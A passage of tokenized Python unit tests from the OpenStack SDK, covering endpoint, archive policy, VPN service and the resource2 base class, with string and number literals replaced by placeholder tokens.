] , sot . id ) <EOL> self . assertEqual ( EXAMPLE [ '<STR_LIT>' ] , sot . interface ) <EOL> self . assertEqual ( EXAMPLE [ '<STR_LIT>' ] , sot . region_id ) <EOL> self . assertEqual ( EXAMPLE [ '<STR_LIT>' ] , sot . service_id ) <EOL> self . assertEqual ( EXAMPLE [ '<STR_LIT:url>' ] , sot . url ) </s>
<s> import mock <EOL> import testtools <EOL> from openstack . metric . v1 import archive_policy <EOL> EXAMPLE = { <EOL> '<STR_LIT>' : <EOL> [ <EOL> { u'<STR_LIT>' : <NUM_LIT:12> , u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u'<STR_LIT>' } , <EOL> { u'<STR_LIT>' : <NUM_LIT> , u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u'<STR_LIT>' } , <EOL> { u'<STR_LIT>' : <NUM_LIT:30> , u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u'<STR_LIT>' } , <EOL> ] , <EOL> u'<STR_LIT>' : <NUM_LIT:0> , <EOL> u'<STR_LIT:name>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : [ u'<STR_LIT>' , u'<STR_LIT>' ] <EOL> } <EOL> class TestArchivePolicy ( testtools . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestArchivePolicy , self ) . setUp ( ) <EOL> self . resp = mock . Mock ( ) <EOL> self . resp . body = '<STR_LIT>' <EOL> self . sess = mock . Mock ( ) <EOL> self . sess . put = mock . Mock ( return_value = self . resp ) <EOL> def test_basic ( self ) : <EOL> m = archive_policy . ArchivePolicy ( ) <EOL> self . assertIsNone ( m . resource_key ) <EOL> self . assertIsNone ( m . resources_key ) <EOL> self . assertEqual ( '<STR_LIT>' , m . base_path ) <EOL> self . assertEqual ( '<STR_LIT>' , m . service . service_type ) <EOL> self . assertTrue ( m . allow_create ) <EOL> self . assertTrue ( m . allow_retrieve ) <EOL> self . assertFalse ( m . allow_update ) <EOL> self . assertTrue ( m . allow_delete ) <EOL> self . assertTrue ( m . allow_list ) <EOL> def test_make_it ( self ) : <EOL> m = archive_policy . ArchivePolicy ( EXAMPLE ) <EOL> self . assertEqual ( EXAMPLE [ '<STR_LIT:name>' ] , m . name ) <EOL> self . assertEqual ( EXAMPLE [ '<STR_LIT>' ] , m . definition ) <EOL> self . assertEqual ( EXAMPLE [ '<STR_LIT>' ] , m . back_window ) <EOL> self . assertEqual ( EXAMPLE [ '<STR_LIT>' ] , m . aggregation_methods ) </s>
<s> import testtools <EOL> from openstack . network . v2 import vpn_service <EOL> IDENTIFIER = '<STR_LIT>' <EOL> EXAMPLE = { <EOL> "<STR_LIT>" : "<STR_LIT:1>" , <EOL> "<STR_LIT:status>" : "<STR_LIT>" , <EOL> "<STR_LIT:name>" : "<STR_LIT:2>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : "<STR_LIT:3>" , <EOL> "<STR_LIT>" : "<STR_LIT:4>" , <EOL> "<STR_LIT:id>" : IDENTIFIER , <EOL> "<STR_LIT:description>" : "<STR_LIT:5>" <EOL> } <EOL> class TestVPNService ( testtools . TestCase ) : <EOL> def test_basic ( self ) : <EOL> sot = vpn_service . VPNService ( ) <EOL> self . assertEqual ( '<STR_LIT>' , sot . resource_key ) <EOL> self . assertEqual ( '<STR_LIT>' , sot . resources_key ) <EOL> self . assertEqual ( '<STR_LIT>' , sot . base_path ) <EOL> self . assertEqual ( '<STR_LIT>' , sot . service . service_type ) <EOL> self . assertTrue ( sot . allow_create ) <EOL> self . assertTrue ( sot . allow_retrieve ) <EOL> self . assertTrue ( sot . allow_update ) <EOL> self . assertTrue ( sot . allow_delete ) <EOL> self . assertTrue ( sot . allow_list ) <EOL> def test_make_it ( self ) : <EOL> sot = vpn_service . VPNService ( EXAMPLE ) <EOL> self . assertTrue ( sot . is_admin_state_up ) <EOL> self . assertEqual ( EXAMPLE [ '<STR_LIT:description>' ] , sot . description ) <EOL> self . assertEqual ( EXAMPLE [ '<STR_LIT:id>' ] , sot . id ) <EOL> self . assertEqual ( EXAMPLE [ '<STR_LIT:name>' ] , sot . name ) <EOL> self . assertEqual ( EXAMPLE [ '<STR_LIT>' ] , sot . router_id ) <EOL> self . assertEqual ( EXAMPLE [ '<STR_LIT>' ] , sot . project_id ) <EOL> self . assertEqual ( EXAMPLE [ '<STR_LIT:status>' ] , sot . status ) <EOL> self . assertEqual ( EXAMPLE [ '<STR_LIT>' ] , sot . subnet_id ) </s>
<s> import itertools <EOL> import mock <EOL> import six <EOL> from openstack import exceptions <EOL> from openstack import format <EOL> from openstack import resource2 <EOL> from openstack import session <EOL> from openstack . tests . unit import base <EOL> class TestComponent ( base . TestCase ) : <EOL> class ExampleComponent ( resource2 . _BaseComponent ) : <EOL> key = "<STR_LIT>" <EOL> def test_implementations ( self ) : <EOL> self . assertEqual ( "<STR_LIT>" , resource2 . Body . key ) <EOL> self . assertEqual ( "<STR_LIT>" , resource2 . Header . key ) <EOL> self . assertEqual ( "<STR_LIT>" , resource2 . URI . key ) <EOL> def test_creation ( self ) : <EOL> sot = resource2 . _BaseComponent ( "<STR_LIT:name>" , type = int , default = <NUM_LIT:1> , <EOL> alternate_id = True ) <EOL> self . assertEqual ( "<STR_LIT:name>" , sot . name ) <EOL> self . assertEqual ( int , sot . type ) <EOL> self . assertEqual ( <NUM_LIT:1> , sot . default ) <EOL> self . assertTrue ( sot . alternate_id ) <EOL> def test_get_no_instance ( self ) : <EOL> sot = resource2 . _BaseComponent ( "<STR_LIT:test>" ) <EOL> result = sot . __get__ ( None , None ) <EOL> self . assertIsNone ( result ) <EOL> def test_get_name_None ( self ) : <EOL> name = "<STR_LIT:name>" <EOL> class Parent ( object ) : <EOL> _example = { name : None } <EOL> instance = Parent ( ) <EOL> sot = TestComponent . ExampleComponent ( name , default = <NUM_LIT:1> ) <EOL> result = sot . __get__ ( instance , None ) <EOL> self . assertIsNone ( result ) <EOL> def test_get_default ( self ) : <EOL> expected_result = <NUM_LIT> <EOL> class Parent ( object ) : <EOL> _example = { } <EOL> instance = Parent ( ) <EOL> sot = TestComponent . ExampleComponent ( "<STR_LIT:name>" , type = dict , <EOL> default = expected_result ) <EOL> result = sot . __get__ ( instance , None ) <EOL> self . assertEqual ( expected_result , result ) <EOL> def test_get_name_untyped ( self ) : <EOL> name = "<STR_LIT:name>" <EOL> expected_result = <NUM_LIT> <EOL> class Parent ( object ) : <EOL> _example = { name : expected_result } <EOL> instance = Parent ( ) <EOL> sot = TestComponent . ExampleComponent ( "<STR_LIT:name>" ) <EOL> result = sot . __get__ ( instance , None ) <EOL> self . assertEqual ( expected_result , result ) <EOL> def test_get_name_typed ( self ) : <EOL> name = "<STR_LIT:name>" <EOL> value = "<STR_LIT>" <EOL> class Parent ( object ) : <EOL> _example = { name : value } <EOL> instance = Parent ( ) <EOL> sot = TestComponent . ExampleComponent ( "<STR_LIT:name>" , type = int ) <EOL> result = sot . __get__ ( instance , None ) <EOL> self . assertEqual ( int ( value ) , result ) <EOL> def test_get_name_formatter ( self ) : <EOL> name = "<STR_LIT:name>" <EOL> value = "<STR_LIT>" <EOL> expected_result = "<STR_LIT>" <EOL> class Parent ( object ) : <EOL> _example = { name : value } <EOL> class FakeFormatter ( object ) : <EOL> @ classmethod <EOL> def deserialize ( cls , value ) : <EOL> return expected_result <EOL> instance = Parent ( ) <EOL> sot = TestComponent . ExampleComponent ( "<STR_LIT:name>" , type = FakeFormatter ) <EOL> mock_issubclass = mock . Mock ( return_value = True ) <EOL> module = six . moves . builtins . __name__ <EOL> with mock . patch ( "<STR_LIT>" % module , mock_issubclass ) : <EOL> result = sot . __get__ ( instance , None ) <EOL> self . assertEqual ( expected_result , result ) <EOL> def test_set_name_untyped ( self ) : <EOL> name = "<STR_LIT:name>" <EOL> expected_value = "<STR_LIT>" <EOL> class Parent ( object ) : <EOL> _example = { } <EOL> instance = Parent ( ) <EOL> sot = TestComponent . ExampleComponent ( "<STR_LIT:name>" ) <EOL> sot . __set__ ( instance , expected_value ) <EOL> self . assertEqual ( expected_value , instance . _example [ name ] ) <EOL> def test_set_name_typed ( self ) : <EOL> expected_value = "<STR_LIT>" <EOL> class Parent ( object ) : <EOL> _example = { } <EOL> instance = Parent ( ) <EOL> class FakeType ( object ) : <EOL> calls = [ ] <EOL> def __init__ ( self , arg ) : <EOL> FakeType . calls . append ( arg ) <EOL> sot = TestComponent . ExampleComponent ( "<STR_LIT:name>" , type = FakeType ) <EOL> sot . __set__ ( instance , expected_value ) <EOL> self . assertEqual ( [ expected_value ] , FakeType . calls ) <EOL> def test_set_name_formatter ( self ) : <EOL> expected_value = "<STR_LIT>" <EOL> class Parent ( object ) : <EOL> _example = { } <EOL> instance = Parent ( ) <EOL> class FakeFormatter ( format . Formatter ) : <EOL> calls = [ ] <EOL> @ classmethod <EOL> def serialize ( cls , arg ) : <EOL> FakeFormatter . calls . append ( arg ) <EOL> sot = TestComponent . ExampleComponent ( "<STR_LIT:name>" , type = FakeFormatter ) <EOL> sot . __set__ ( instance , expected_value ) <EOL> self . assertEqual ( [ expected_value ] , FakeFormatter . calls ) <EOL> def test_delete_name ( self ) : <EOL> name = "<STR_LIT:name>" <EOL> expected_value = "<STR_LIT>" <EOL> class Parent ( object ) : <EOL> _example = { name : expected_value } <EOL> instance = Parent ( ) <EOL> sot = TestComponent . ExampleComponent ( "<STR_LIT:name>" ) <EOL> sot . __delete__ ( instance ) <EOL> self . assertNotIn ( name , instance . _example ) <EOL> def test_delete_name_doesnt_exist ( self ) : <EOL> name = "<STR_LIT:name>" <EOL> expected_value = "<STR_LIT>" <EOL> class Parent ( object ) : <EOL> _example = { "<STR_LIT>" : expected_value } <EOL> instance = Parent ( ) <EOL> sot = TestComponent . ExampleComponent ( name ) <EOL> sot . __delete__ ( instance ) <EOL> self . assertNotIn ( name , instance . _example ) <EOL> class TestComponentManager ( base . TestCase ) : <EOL> def test_create_basic ( self ) : <EOL> sot = resource2 . _ComponentManager ( ) <EOL> self . assertEqual ( dict ( ) , sot . attributes ) <EOL> self . assertEqual ( set ( ) , sot . _dirty ) <EOL> def test_create_unsynced ( self ) : <EOL> attrs = { "<STR_LIT>" : <NUM_LIT:1> , "<STR_LIT>" : <NUM_LIT:2> , "<STR_LIT:hello>" : <NUM_LIT:3> } <EOL> sync = False <EOL> sot = resource2 . _ComponentManager ( attributes = attrs , synchronized = sync ) <EOL> self . assertEqual ( attrs , sot . attributes ) <EOL> self . assertEqual ( set ( attrs . keys ( ) ) , sot . _dirty ) <EOL> def test_create_synced ( self ) : <EOL> attrs = { "<STR_LIT>" : <NUM_LIT:1> , "<STR_LIT>" : <NUM_LIT:2> , "<STR_LIT:hello>" : <NUM_LIT:3> } <EOL> sync = True <EOL> sot = resource2 . _ComponentManager ( attributes = attrs , synchronized = sync ) <EOL> self . assertEqual ( attrs , sot . attributes ) <EOL> self . assertEqual ( set ( ) , sot . _dirty ) <EOL> def test_getitem ( self ) : <EOL> key = "<STR_LIT:key>" <EOL> value = "<STR_LIT:value>" <EOL> attrs = { key : value } <EOL> sot = resource2 . _ComponentManager ( attributes = attrs ) <EOL> self . assertEqual ( value , sot . __getitem__ ( key ) ) <EOL> def test_setitem_new ( self ) : <EOL> key = "<STR_LIT:key>" <EOL> value = "<STR_LIT:value>" <EOL> sot = resource2 . _ComponentManager ( ) <EOL> sot . __setitem__ ( key , value ) <EOL> self . assertIn ( key , sot . attributes ) <EOL> self . assertIn ( key , sot . dirty ) <EOL> def test_setitem_unchanged ( self ) : <EOL> key = "<STR_LIT:key>" <EOL> value = "<STR_LIT:value>" <EOL> attrs = { key : value } <EOL> sot = resource2 . _ComponentManager ( attributes = attrs , synchronized = True ) <EOL> sot . __setitem__ ( key , value ) <EOL> self . assertEqual ( value , sot . attributes [ key ] ) <EOL> self . assertNotIn ( key , sot . dirty ) <EOL> def test_delitem ( self ) : <EOL> key = "<STR_LIT:key>" <EOL> value = "<STR_LIT:value>" <EOL> attrs = { key : value } <EOL> sot = resource2 . _ComponentManager ( attributes = attrs , synchronized = True ) <EOL> sot . __delitem__ ( key ) <EOL> self . assertIsNone ( sot . dirty [ key ] ) <EOL> def test_iter ( self ) : <EOL> attrs = { "<STR_LIT:key>" : "<STR_LIT:value>" } <EOL> sot = resource2 . _ComponentManager ( attributes = attrs ) <EOL> self . assertItemsEqual ( iter ( attrs ) , sot . __iter__ ( ) ) <EOL> def test_len ( self ) : <EOL> attrs = { "<STR_LIT:key>" : "<STR_LIT:value>" } <EOL> sot = resource2 . _ComponentManager ( attributes = attrs ) <EOL> self . assertEqual ( len ( attrs ) , sot . __len__ ( ) ) <EOL> def test_dirty ( self ) : <EOL> key = "<STR_LIT:key>" <EOL> key2 = "<STR_LIT>" <EOL> value = "<STR_LIT:value>" <EOL> attrs = { key : value } <EOL> sot = resource2 . _ComponentManager ( attributes = attrs , synchronized = False ) <EOL> self . assertEqual ( { key : value } , sot . dirty ) <EOL> sot . __setitem__ ( key2 , value ) <EOL> self . assertEqual ( { key : value , key2 : value } , sot . dirty ) <EOL> def test_clean ( self ) : <EOL> key = "<STR_LIT:key>" <EOL> value = "<STR_LIT:value>" <EOL> attrs = { key : value } <EOL> sot = resource2 . _ComponentManager ( attributes = attrs , synchronized = False ) <EOL> self . assertEqual ( attrs , sot . dirty ) <EOL> sot . clean ( ) <EOL> self . assertEqual ( dict ( ) , sot . dirty ) <EOL> class Test_Request ( base . TestCase ) : <EOL> def test_create ( self ) : <EOL> uri = <NUM_LIT:1> <EOL> body = <NUM_LIT:2> <EOL> headers = <NUM_LIT:3> <EOL> sot = resource2 . _Request ( uri , body , headers ) <EOL> self . assertEqual ( uri , sot . uri ) <EOL> self . assertEqual ( body , sot . body ) <EOL> self . assertEqual ( headers , sot . headers ) <EOL> class TestQueryParameters ( base . TestCase ) : <EOL> def test_create ( self ) : <EOL> location = "<STR_LIT:location>" <EOL> mapping = { "<STR_LIT>" : "<STR_LIT>" } <EOL> sot = resource2 . QueryParameters ( location , ** mapping ) <EOL> self . assertEqual ( { "<STR_LIT:location>" : "<STR_LIT:location>" , "<STR_LIT>" : "<STR_LIT>" } , <EOL> sot . _mapping ) <EOL> def test_transpose_unmapped ( self ) : <EOL> location = "<STR_LIT:location>" <EOL> mapping = { "<STR_LIT>" : "<STR_LIT>" } <EOL> sot = resource2 . QueryParameters ( location , ** mapping ) <EOL> result = sot . _transpose ( { "<STR_LIT:location>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } ) <EOL> self . assertEqual ( { "<STR_LIT:location>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } , <EOL> result ) <EOL> def test_transpose_not_in_query ( self ) : <EOL> location = "<STR_LIT:location>" <EOL> mapping = { "<STR_LIT>" : "<STR_LIT>" } <EOL> sot = resource2 . QueryParameters ( location , ** mapping ) <EOL> result = sot . _transpose ( { "<STR_LIT:location>" : "<STR_LIT>" } ) <EOL> self . assertEqual ( { "<STR_LIT:location>" : "<STR_LIT>" } , <EOL> result ) <EOL> class TestResource ( base . TestCase ) : <EOL> def test_initialize_basic ( self ) : <EOL> body = { "<STR_LIT:body>" : <NUM_LIT:1> } <EOL> header = { "<STR_LIT>" : <NUM_LIT:2> } <EOL> uri = { "<STR_LIT>" : <NUM_LIT:3> } <EOL> everything = dict ( itertools . chain ( body . items ( ) , header . items ( ) , <EOL> uri . items ( ) ) ) <EOL> mock_collect = mock . Mock ( ) <EOL> mock_collect . return_value = body , header , uri <EOL> with mock . patch . object ( resource2 . Resource , <EOL> "<STR_LIT>" , mock_collect ) : <EOL> sot = resource2 . Resource ( synchronized = False , ** everything ) <EOL> mock_collect . assert_called_once_with ( everything ) <EOL> self . assertIsInstance ( sot . _body , resource2 . _ComponentManager ) <EOL> self . assertEqual ( body , sot . _body . dirty ) <EOL> self . assertIsInstance ( sot . _header , resource2 . _ComponentManager ) <EOL> self . assertEqual ( header , sot . _header . dirty ) <EOL> self . assertIsInstance ( sot . _uri , resource2 . _ComponentManager ) <EOL> self . assertEqual ( uri , sot . _uri . dirty ) <EOL> self . assertFalse ( sot . allow_create ) <EOL> self . assertFalse ( sot . allow_get ) <EOL> self . assertFalse ( sot . allow_update ) <EOL> self . assertFalse ( sot . allow_delete ) <EOL> self . assertFalse ( sot . allow_list ) <EOL> self . assertFalse ( sot . allow_head ) <EOL> self . assertFalse ( sot . patch_update ) <EOL> def test_repr ( self ) : <EOL> a = { "<STR_LIT:a>" : <NUM_LIT:1> } <EOL> b = { "<STR_LIT:b>" : <NUM_LIT:2> } <EOL> c = { "<STR_LIT:c>" : <NUM_LIT:3> } <EOL> class Test ( resource2 . Resource ) : <EOL> def __init__ ( self ) : <EOL> self . _body = mock . Mock ( ) <EOL> self . _body . attributes . items = mock . Mock ( <EOL> return_value = a . items ( ) ) <EOL> self . _header = mock . Mock ( ) <EOL> self . _header . attributes . items = mock . Mock ( <EOL> return_value = b . items ( ) ) <EOL> self . _uri = mock . Mock ( ) <EOL> self . _uri . attributes . items = mock . Mock ( <EOL> return_value = c . items ( ) ) <EOL> the_repr = repr ( Test ( ) ) <EOL> self . assertIn ( "<STR_LIT>" , the_repr ) <EOL> self . assertIn ( "<STR_LIT>" , the_repr ) <EOL> self . assertIn ( "<STR_LIT>" , the_repr ) <EOL> self . assertIn ( "<STR_LIT>" , the_repr ) <EOL> def test__update ( self ) : <EOL> sot = resource2 . Resource ( ) <EOL> body = "<STR_LIT:body>" <EOL> header = "<STR_LIT>" <EOL> uri = "<STR_LIT>" <EOL> sot . _collect_attrs = mock . Mock ( return_value = ( body , header , uri ) ) <EOL> sot . _body . update = mock . Mock ( ) <EOL> sot . _header . update = mock . Mock ( ) <EOL> sot . _uri . update = mock . Mock ( ) <EOL> args = { "<STR_LIT>" : <NUM_LIT:1> } <EOL> sot . _update ( ** args ) <EOL> sot . _collect_attrs . assert_called_once_with ( args ) <EOL> sot . _body . update . assert_called_once_with ( body ) <EOL> sot . _header . update . assert_called_once_with ( header ) <EOL> sot . _uri . update . assert_called_once_with ( uri ) <EOL> def test__collect_attrs ( self ) : <EOL> sot = resource2 . Resource ( ) <EOL> expected_attrs = [ "<STR_LIT:body>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> sot . _consume_attrs = mock . Mock ( ) <EOL> sot . _consume_attrs . side_effect = expected_attrs <EOL> actual_attrs = sot . _collect_attrs ( dict ( ) ) <EOL> self . assertItemsEqual ( expected_attrs , actual_attrs ) <EOL> def test__consume_attrs ( self ) : <EOL> serverside_key1 = "<STR_LIT>" <EOL> clientside_key1 = "<STR_LIT>" <EOL> serverside_key2 = "<STR_LIT>" <EOL> clientside_key2 = "<STR_LIT>" <EOL> value1 = "<STR_LIT>" <EOL> value2 = "<STR_LIT>" <EOL> mapping = { clientside_key1 : serverside_key1 , <EOL> clientside_key2 : serverside_key2 } <EOL> other_key = "<STR_LIT>" <EOL> other_value = "<STR_LIT>" <EOL> attrs = { clientside_key1 : value1 , <EOL> serverside_key2 : value2 , <EOL> other_key : other_value } <EOL> sot = resource2 . Resource ( ) <EOL> result = sot . _consume_attrs ( mapping , attrs ) <EOL> self . assertDictEqual ( { other_key : other_value } , attrs ) <EOL> self . assertDictEqual ( { serverside_key1 : value1 , <EOL> serverside_key2 : value2 } , result ) <EOL> def test__mapping_defaults ( self ) : <EOL> self . assertIn ( "<STR_LIT:location>" , resource2 . Resource . _header_mapping ( ) ) <EOL> self . assertIn ( "<STR_LIT:name>" , resource2 . Resource . _body_mapping ( ) ) <EOL> self . assertIn ( "<STR_LIT:id>" , resource2 . Resource . _body_mapping ( ) ) <EOL> def test__mapping_overrides ( self ) : <EOL> new_name = "<STR_LIT>" <EOL> new_id = "<STR_LIT>" <EOL> class Test ( resource2 . Resource ) : <EOL> name = resource2 . Body ( new_name ) <EOL> id = resource2 . Body ( new_id ) <EOL> mapping = Test . _body_mapping ( ) <EOL> self . assertEqual ( new_name , mapping [ "<STR_LIT:name>" ] ) <EOL> self . assertEqual ( new_id , mapping [ "<STR_LIT:id>" ] ) <EOL> def test__body_mapping ( self ) : <EOL> class Test ( resource2 . Resource ) : <EOL> x = resource2 . Body ( "<STR_LIT:x>" ) <EOL> y = resource2 . Body ( "<STR_LIT:y>" ) <EOL> z = resource2 . Body ( "<STR_LIT:z>" ) <EOL> self . assertIn ( "<STR_LIT:x>" , Test . _body_mapping ( ) ) <EOL> self . assertIn ( "<STR_LIT:y>" , Test . _body_mapping ( ) ) <EOL> self . assertIn ( "<STR_LIT:z>" , Test . _body_mapping ( ) ) <EOL> def test__header_mapping ( self ) : <EOL> class Test ( resource2 . Resource ) : <EOL> x = resource2 . Header ( "<STR_LIT:x>" ) <EOL> y = resource2 . Header ( "<STR_LIT:y>" ) <EOL> z = resource2 . Header ( "<STR_LIT:z>" ) <EOL> self . assertIn ( "<STR_LIT:x>" , Test . _header_mapping ( ) ) <EOL> self . assertIn ( "<STR_LIT:y>" , Test . _header_mapping ( ) ) <EOL> self . assertIn ( "<STR_LIT:z>" , Test . _header_mapping ( ) ) <EOL> def test__uri_mapping ( self ) : <EOL> class Test ( resource2 . Resource ) : <EOL> x = resource2 . URI ( "<STR_LIT:x>" ) <EOL> y = resource2 . URI ( "<STR_LIT:y>" ) <EOL> z = resource2 . URI ( "<STR_LIT:z>" ) <EOL> self . assertIn ( "<STR_LIT:x>" , Test . _uri_mapping ( ) ) <EOL> self . assertIn ( "<STR_LIT:y>" , Test . _uri_mapping ( ) ) <EOL> self . assertIn ( "<STR_LIT:z>" , Test . _uri_mapping ( ) ) <EOL> def test__alternate_id_None ( self ) : <EOL> self . assertEqual ( "<STR_LIT>" , resource2 . Resource . _alternate_id ( ) ) <EOL> def test__alternate_id ( self ) : <EOL> class Test ( resource2 . Resource ) : <EOL> alt = resource2 . Body ( "<STR_LIT>" , alternate_id = True ) <EOL> self . assertTrue ( "<STR_LIT>" , Test . _alternate_id ( ) ) <EOL> def test__get_id_instance ( self ) : <EOL> class Test ( resource2 . Resource ) : <EOL> id = resource2 . Body ( "<STR_LIT:id>" ) <EOL> value = "<STR_LIT:id>" <EOL> sot = Test ( id = value ) <EOL> self . assertEqual ( value , sot . _get_id ( sot ) ) <EOL> def test__get_id_instance_alternate ( self ) : <EOL> class Test ( resource2 . Resource ) : <EOL> attr = resource2 . Body ( "<STR_LIT>" , alternate_id = True ) <EOL> value = "<STR_LIT:id>" <EOL> sot = Test ( attr = value ) <EOL> self . assertEqual ( value , sot . _get_id ( sot ) ) <EOL> def test__get_id_value ( self ) : <EOL> value = "<STR_LIT:id>" <EOL> self . assertEqual ( value , resource2 . Resource . _get_id ( value ) ) <EOL> def test_new ( self ) : <EOL> class Test ( resource2 . Resource ) : <EOL> attr = resource2 . Body ( "<STR_LIT>" ) <EOL> value = "<STR_LIT:value>" <EOL> sot = Test . new ( attr = value ) <EOL> self . assertIn ( "<STR_LIT>" , sot . _body . dirty ) <EOL> self . assertEqual ( value , sot . attr ) <EOL> def test_existing ( self ) : <EOL> class Test ( resource2 . Resource ) : <EOL> attr = resource2 . Body ( "<STR_LIT>" ) <EOL> value = "<STR_LIT:value>" <EOL> sot = Test . existing ( attr = value ) <EOL> self . assertNotIn ( "<STR_LIT>" , sot . _body . dirty ) <EOL> self . assertEqual ( value , sot . attr ) <EOL> def test__prepare_request_with_id ( self ) : <EOL> class Test ( resource2 . Resource ) : <EOL> base_path = "<STR_LIT>" <EOL> body_attr = resource2 . Body ( "<STR_LIT:x>" ) <EOL> header_attr = resource2 . Header ( "<STR_LIT:y>" ) <EOL> the_id = "<STR_LIT:id>" <EOL> body_value = "<STR_LIT:body>" <EOL> header_value = "<STR_LIT>" <EOL> sot = Test ( id = the_id , body_attr = body_value , header_attr = header_value , <EOL> synchronized = False ) <EOL> result = sot . _prepare_request ( requires_id = True ) <EOL> self . assertEqual ( "<STR_LIT>" , result . uri ) <EOL> self . assertEqual ( { "<STR_LIT:x>" : body_value , "<STR_LIT:id>" : the_id } , result . body ) <EOL> self . assertEqual ( { "<STR_LIT:y>" : header_value } , result . headers ) <EOL> def test__prepare_request_missing_id ( self ) : <EOL> sot = resource2 . Resource ( id = None ) <EOL> self . assertRaises ( exceptions . InvalidRequest , <EOL> sot . _prepare_request , requires_id = True ) <EOL> def test__prepare_request_with_key ( self ) : <EOL> key = "<STR_LIT:key>" <EOL> class Test ( resource2 . Resource ) : <EOL> base_path = "<STR_LIT>" <EOL> resource_key = key <EOL> body_attr = resource2 . Body ( "<STR_LIT:x>" ) <EOL> header_attr = resource2 . Header ( "<STR_LIT:y>" ) <EOL> body_value = "<STR_LIT:body>" <EOL> header_value = "<STR_LIT>" <EOL> sot = Test ( body_attr = body_value , header_attr = header_value , <EOL> synchronized = False ) <EOL> result = sot . _prepare_request ( requires_id = False , prepend_key = True ) <EOL> self . assertEqual ( "<STR_LIT>" , result . uri ) <EOL> self . assertEqual ( { key : { "<STR_LIT:x>" : body_value } } , result . body ) <EOL> self . assertEqual ( { "<STR_LIT:y>" : header_value } , result . headers ) <EOL> def test__transpose_component ( self ) : <EOL> client_name = "<STR_LIT>" <EOL> server_name = "<STR_LIT>" <EOL> value = "<STR_LIT:value>" <EOL> mapping = { client_name : server_name , "<STR_LIT>" : "<STR_LIT>" } <EOL> component = { server_name : value } <EOL> sot = resource2 . Resource ( ) <EOL> result = sot . _transpose_component ( component , mapping ) <EOL> self . assertEqual ( { client_name : value } , result ) <EOL> def test__translate_response_no_body ( self ) : <EOL> class Test ( resource2 . Resource ) : <EOL> attr = resource2 . Header ( "<STR_LIT>" ) <EOL> response = mock . Mock ( ) <EOL> response . headers = dict ( ) <EOL> sot = Test ( ) <EOL> sot . _transpose_component = mock . Mock ( return_value = { "<STR_LIT>" : "<STR_LIT:value>" } ) <EOL> sot . _translate_response ( response , has_body = False ) <EOL> self . assertEqual ( dict ( ) , sot . _header . dirty ) <EOL> self . assertEqual ( "<STR_LIT:value>" , sot . attr ) <EOL> def test__translate_response_with_body_no_resource_key ( self ) : <EOL> class Test ( resource2 . Resource ) : <EOL> attr = resource2 . Body ( "<STR_LIT>" ) <EOL> body = { "<STR_LIT>" : "<STR_LIT:value>" } <EOL> response = mock . Mock ( ) <EOL> response . headers = dict ( ) <EOL> response . json . return_value = body <EOL> sot = Test ( ) <EOL> sot . _transpose_component = mock . Mock ( side_effect = [ body , dict ( ) ] ) <EOL> sot . _translate_response ( response , has_body = True ) <EOL> self . assertEqual ( "<STR_LIT:value>" , sot . attr ) <EOL> self . assertEqual ( dict ( ) , sot . _body . dirty ) <EOL> self . assertEqual ( dict ( ) , sot . _header . dirty ) <EOL> def test__translate_response_with_body_with_resource_key ( self ) : <EOL> key = "<STR_LIT:key>" <EOL> class Test ( resource2 . Resource ) : <EOL> resource_key = key <EOL> attr = resource2 . Body ( "<STR_LIT>" ) <EOL> body = { "<STR_LIT>" : "<STR_LIT:value>" } <EOL> response = mock . Mock ( ) <EOL> response . headers = dict ( ) <EOL> response . json . return_value = { key : body } <EOL> sot = Test ( ) <EOL> sot . _transpose_component = mock . Mock ( side_effect = [ body , dict ( ) ] ) <EOL> sot . _translate_response ( response , has_body = True ) <EOL> self . assertEqual ( "<STR_LIT:value>" , sot . attr ) <EOL> self . assertEqual ( dict ( ) , sot . _body . dirty ) <EOL> self . assertEqual ( dict ( ) , sot . _header . dirty ) <EOL> def test_cant_do_anything ( self ) : <EOL> class Test ( resource2 . Resource ) : <EOL> allow_create = False <EOL> allow_get = False <EOL> allow_update = False <EOL> allow_delete = False <EOL> allow_head = False <EOL> allow_list = False <EOL> sot = Test ( ) <EOL> self . assertRaises ( exceptions . MethodNotSupported , sot . create , "<STR_LIT>" ) <EOL> self . assertRaises ( exceptions . MethodNotSupported , sot . get , "<STR_LIT>" ) <EOL> self . assertRaises ( exceptions . MethodNotSupported , sot . delete , "<STR_LIT>" ) <EOL> self . assertRaises ( exceptions . MethodNotSupported , sot . head , "<STR_LIT>" ) <EOL> the_list = sot . list ( "<STR_LIT>" ) <EOL> self . assertRaises ( exceptions . MethodNotSupported , next , the_list ) <EOL> sot . _body = mock . Mock ( ) <EOL> sot . _body . dirty = mock . Mock ( return_value = { "<STR_LIT:x>" : "<STR_LIT:y>" } ) <EOL> self . assertRaises ( exceptions . MethodNotSupported , sot . update , "<STR_LIT>" ) <EOL> class TestResourceActions ( base . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestResourceActions , self ) . setUp ( ) <EOL> self . service_name = "<STR_LIT>" <EOL> self . base_path = "<STR_LIT>" <EOL> class Test ( resource2 . Resource ) : <EOL> service = self . service_name <EOL> base_path = self . base_path <EOL> allow_create = True <EOL> allow_get = True <EOL> allow_head = True <EOL> allow_update = True <EOL> allow_delete = True <EOL> allow_list = True <EOL> self . test_class = Test <EOL> self . request = mock . Mock ( spec = resource2 . _Request ) <EOL> self . request . uri = "<STR_LIT>" <EOL> self . request . body = "<STR_LIT:body>" <EOL> self . request . headers = "<STR_LIT>" <EOL> self . response = mock . Mock ( ) <EOL> self . sot = Test ( id = "<STR_LIT:id>" ) <EOL> self . sot . _prepare_request = mock . Mock ( return_value = self . request ) <EOL> self . sot . _translate_response = mock . Mock ( ) <EOL> self . session = mock . Mock ( spec = session . Session ) <EOL> self . session . create = mock . Mock ( return_value = self . response ) <EOL> self . session . get = mock . Mock ( return_value = self . response ) <EOL> self . session . put = mock . Mock ( return_value = self . response ) <EOL> self . session . patch = mock . Mock ( return_value = self . response ) <EOL> self . session . post = mock . Mock ( return_value = self . response ) <EOL> self . session . delete = mock . Mock ( return_value = self . response ) <EOL> self . session . 